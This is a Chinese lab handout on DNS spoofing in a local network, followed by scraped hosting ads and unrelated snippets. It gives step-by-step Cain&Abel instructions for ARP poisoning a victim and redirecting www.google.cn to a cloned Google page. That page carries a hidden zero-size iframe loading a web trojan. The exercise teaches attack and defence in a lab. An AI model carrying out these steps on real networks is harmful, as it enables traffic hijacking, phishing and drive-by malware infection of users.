如图【最新资料】DNS欺骗实验报告4-1
实验5 DNS欺骗
实验任务一
1安装Cain&Abel
下载并运行"Cain&Abel v4.9.26"安装程序安装完毕后会弹出一个安装提示对话框要求安装WinPcap v4.0.2如图8-51所示。如果前面已经安装过就可以单击【Don't install】按钮取消WinP c ap的安装。
2制作假Google网页
用IE浏览器打开Google主页选择菜单栏中的【菜单】→【另存为】命令。在弹出的"另存为"对话框中指定保存路径设置"保存类型"为"网页全部"如图8-52所示。单击【确定】按钮保存生成名为"goog le.htm"的网页及相关图片文件夹"Goog le.files"。
用记事本打开"google.htm"文件并进行编辑在"<SCRIPT defer><!--//--></SCRIPT>"字符串前输入如下命令见图8-53
1. <iframe src="http://192.168.1.198/index.htm" width=0 height=0></iframe>
上面的IP应该是192.168.1.8
然后保存网页的修改。
将"google.htm"和"Google.files"复制到刚才的"C:\web"文件夹中。运行"紫雨轩ASP Web服务器"将"缺省文件"设置为"goog le.htm"单击【保存】按钮完成设置。
在浏览器中输入本机的IP地址按【Enter】键后即可打开假Google网页并且网页中嵌入了网页木马如图8-54所示。
对于这种内嵌网页木马的方式杀毒软件不会给出警告但是我们可以从"紫雨轩ASPWeb服务器"的运行记录中看到木马实际上已经被执行了如图8-55所示。
3选择欺骗攻击目标
运行Cain&Abel v4.9.26单击工具栏上的【Start/Stop ARP】按钮如图8-56所示弹出设置对话框。
内网中的DNS欺骗强大的欺骗工具Cain 2
在其中选择自己用来嗅探的网卡需要选择能正确显示IP地址的网卡如图8-57所示。单击【确定】按钮后关闭对话框单击工具栏中的【Start/Stop Sniff】按钮再选择下方的"Sniffer"选项卡如图8-58所示。
单击工具栏中的【Add to List】按钮弹出"MAC Address Scanner"对话框如图8-59所示选择"All hosts in my subnet 本机所在子网中的所有主机 "单选按钮单击【确定】按钮后程序将自动扫描局域网中的所有在线主机。扫描结束后程序窗口列表中显示出扫描结果如图8-60所示。
选择"Sniffer"选项卡中窗口列表下方的"ARP"小选项卡切换到"ARP"页面。选择左侧目录树中的顶层"ARP"选项在右边的窗格列表空白处单击鼠标左键工具栏上的【Add toLis t】按钮被激活如图8-61所示。
单击【Add to list】按钮弹出"New ARP Poison Routing"对话框在对话框左边的列表中显示当前局域网中的IP地址。在列表中选择要进行欺骗的IP地址这里假设要欺骗的IP地址为"192.168.1.9"在右边选择被欺骗IP的目标网关如图8-62所示最后单击【确定】按钮关闭对话框在窗口列表中可以看到添加的欺骗主机如图8-63所示。
4DNS欺骗攻击
在"Sniffer"选项卡的"ARP"页面中选择左侧目录树中的"ARP-DNS"选项如图8-64所示在右边的窗格列表空白处单击鼠标左键激活工具栏上的【Add to List】按钮。
单击【Add to List】按钮弹出"DNS Spoofer for APR"对话框。在"DNS Name Requested请求DNS域名"文本框中输入要正常访问的网站这里为Goog le的网页"www.google.cn"然后在"IP adress to rewrite in response packets 改写响应数据包的IP地址 "文本框中输入本机的IP"192.168.1.8"如图8-65所示。
设置完成后单击【O K】按钮DNS欺骗将被添加到程序窗口列表中如图8-66所示。
经过设置后当被欺骗的主机访问Google的网页"http://w ww.go ogle.c n"时将会被Cain&Abel工具进行数据包捕获修改将其域名解析到攻击者指定的IP地址"192.168.1.8"的网页服务。用同样的方法添加局域网中的其他任意主机到攻击目标中并设置其欺骗域名与IP地址。
设置完毕后单击【Start/Stop ARP】按钮 DNS欺骗工作就开始了。此时指定的IP地址在访问"http://www.google.c n"时就会自动跳转到攻击者刚刚建立的假Google页面上。实验任务二、使用ARP防火墙
任务简要写出实验一的核心原理并截图(需要CAIN的设置图863及866)
需要说明各个计算机所扮演的角色以及数据流向各个计算机需要安装什么服务或者什么软件。
- 如图【最新资料】DNS欺骗实验报告4-1相关文档
- 招标文件项目编号:晋政采[2015-0195]G107-A152
- 投标dns欺骗
- 支持dns欺骗
- 研究方向NULL字符欺骗DNS监控系统的研究
- 地址基于ARP与DNS欺骗的重定向技术的研究
- 攻击者【网络工程规划与设计案例教程】项目三_任务一_DNS欺骗分析与防范
半月湾($59.99/年),升级带宽至200M起步 三网CN2 GIA线路
在前面的文章中就有介绍到半月湾Half Moon Bay Cloud服务商有提供洛杉矶DC5数据中心云服务器,这个堪比我们可能熟悉的某服务商,如果我们有用过的话会发现这个服务商的价格比较贵,而且一直缺货。这里,于是半月湾服务商看到机会来了,于是有新增同机房的CN2 GIA优化线路。在之前的文章中介绍到Half Moon Bay Cloud DC5机房且进行过测评。这次的变化是从原来基础的年付49....
阿里云服务器绑定域名的几个流程整理
今天遇到一个网友,他之前一直在用阿里云虚拟主机,我们知道虚拟主机绑定域名是直接在面板上绑定的。这里由于他的网站项目流量比较大,虚拟主机是不够的,而且我看他虚拟主机已经有升级过。这里要说的是,用过阿里云虚拟主机的朋友可能会比较一下价格,实际上虚拟主机价格比云服务器还贵。所以,基于成本和性能的考虑,建议他选择云服务器。毕竟他的备案都接入在阿里云。这里在选择阿里云服务器后,他就蒙圈不知道如何绑定域名。这...
青云互联19元/月,美国洛杉矶CN2GIA/香港安畅CN2云服务器低至;日本云主机
青云互联怎么样?青云互联美国洛杉矶cn2GIA云服务器低至19元/月起;香港安畅cn2云服务器低至19元/月起;日本cn2云主机低至35元/月起!青云互联是一家成立于2020年的主机服务商,致力于为用户提供高性价比稳定快速的主机托管服务。青云互联本站之前已经更新过很多相关文章介绍了,青云互联的机房有香港和洛杉矶,都有CN2 GIA线路、洛杉矶带高防,商家承诺试用7天,打死全额退款点击进入:青云互联...
-
摩拜超15分钟加钱首次 微信扫 摩拜单车 需要 付压金吗2020双十一成绩单2020年12月四级考试什么时候出成绩johncusack约翰·库萨克好看的的恐怖片全集云计算什么是云计算?lunwenjiance我写的论文,检测相似度是21.63%,删掉参考文献后就只有6.3%,这是为什么?dpscycleDPScycle插件为什么没有猎人模块 最好详细点铂金血痕手上出现这种血痕是什么情况。有谁知道能告诉下吗? 怎么治疗!ename.com趫 是什么意思?猴山条约尼布楚条约,是我们割地,为什么说是公平条约呢雀嘴鳝专家教下怎么才能饲养好一条雀鳝鱼?